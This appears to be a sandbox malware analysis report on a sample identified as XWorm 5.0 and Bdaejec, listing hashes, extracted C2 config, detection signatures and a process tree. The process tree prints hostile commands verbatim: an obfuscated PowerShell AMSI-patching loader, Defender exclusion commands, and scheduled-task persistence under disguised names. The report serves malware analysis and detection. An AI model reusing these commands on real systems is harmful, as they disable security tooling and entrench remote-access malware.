Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-10-2024 05:53

General

  • Target

    ME77ZTVpfPe1.exe

  • Size

    360KB

  • MD5

    a0a4c2e4123c895b019404faac31eea5

  • SHA1

    18254b9eda5a7d1bb9505cc46b992709029091c8

  • SHA256

    1c74716aa959672f89ca6a090cf8aee85eee235980f00cf4a1f049b265b4a836

  • SHA512

    3b6f9347cfd753607014147dddd1a60f87a8580f84caba99b72b8b319d1e7b8a52bad76a5d81653fabb083c4a037ed28e4cd4178aecde3a19b1ef419b853709c

  • SSDEEP

    6144:KIrgO6OmMo/f7DGUOodFeq4cH0RfWLN0SMJWW6vtuwFi0QRjZj:F8XGPoDeqnUR+N3fVVxM0QRjZj

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

K2D8kOjfVfBUprBZ

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/BSSw6HT3

aes.plain

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:384
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d577e440-774b-4dae-b112-1fa244bcd54a}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1428
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:680
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:740
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:868
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1092
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1100
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1144
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2768
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DkvrtYzMINMC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CofLyMqMdsgoFI,[Parameter(Position=1)][Type]$WLktYNWdvy)$qXksweqzRwM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+',Pub'+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'Ans'+'i'+''+'C'+'las'+[Char](115)+','+[Char](65)+''+'u'+'to'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$qXksweqzRwM.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Man'+[Char](97)+''+'g'+''+'e'+''+'d'+'');$qXksweqzRwM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+'c'+''+','+'Hid'+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'l',$WLktYNWdvy,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $qXksweqzRwM.CreateType();}$ldCoZlNiHedJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'tem'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cr'+[Char](111)+''+'s'+'o'+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+[Char](111)+'d'+[Char](115)+'');$MLDkvhWLBHdWsR=$ldCoZlNiHedJv.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$huHavpRrIQjpmNhIqBs=DkvrtYzMINMC @([String])([IntPtr]);$yVlwQSqBSRsdECWQEdAVcQ=DkvrtYzMINMC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ynJZzkflQPe=$ldCoZlNiHedJv.GetMethod('G'+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+''+'H'+''+'a'+'ndl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'nel3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XiRCvkVWzvwGhn=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+'a'+'r'+''+[Char](121)+''+'A'+'')));$SHagYkbMlGciWpBLB=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+[Char](117)+'al'+'P'+''+[Char](114)+'ot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$IeJQJWs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XiRCvkVWzvwGhn,$huHavpRrIQjpmNhIqBs).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i.dl'+'l'+'');$JllDsCdyNUFVDEUNm=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$IeJQJWs,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$nZRFSAoSkO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,4,[ref]$nZRFSAoSkO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JllDsCdyNUFVDEUNm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,0x20,[ref]$nZRFSAoSkO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+'w'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2632
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1188
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1216
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1336
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2620
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1356
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1492
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1556
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1572
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1672
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1712
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1744
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1780
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1820
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1968
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1984
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1996
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1408
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2124
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:2196
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2224
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2232
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2436
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2444
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2648
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2716
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2800
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2828
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2840
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2856
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2980
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2160
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3288
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3428
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe"
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4408
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "powershell.exe" Add-MpPreference -ExclusionExtension '.exe'
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4796
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Powershell.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp/Powershell.exe
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Drops file in Windows directory
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1052
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1832
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.msedge" /SC ONLOGON /TR "C:\Windows\Fonts\www.msedge.exe" /RL HIGHEST
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3616
                                                                                          • C:\Windows\Fonts\www.msedge.exe
                                                                                            "C:\Windows\Fonts\www.msedge.exe"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:452
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3848
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.msedge.exe'
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3876
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                6⤵
                                                                                                  PID:4708
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com'
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2680
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  6⤵
                                                                                                    PID:2040
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.MsEgeServ.com'
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3144
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    6⤵
                                                                                                      PID:3264
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.MsEgeServ" /tr "C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com"
                                                                                                    5⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:4528
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      6⤵
                                                                                                        PID:1832
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe'
                                                                                                    4⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:484
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
                                                                                                    4⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:400
                                                                                                  • C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe
                                                                                                    "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4808
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
                                                                                                      5⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1692
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1fc7190a.bat" "
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4056
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:4500
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                1⤵
                                                                                                  PID:3560
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3756
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3976
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:1136
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:388
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:5032
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:3636
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:1524
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                  PID:1180
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                    PID:4828
                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3472
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                      1⤵
                                                                                                                        PID:3624
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:4712
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                          1⤵
                                                                                                                            PID:2056
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4004
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:3088
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                1⤵
                                                                                                                                  PID:3132
                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  PID:4396
                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:2596
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:2880
                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:4512

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                        SHA1

                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                        SHA256

                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                        SHA512

                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

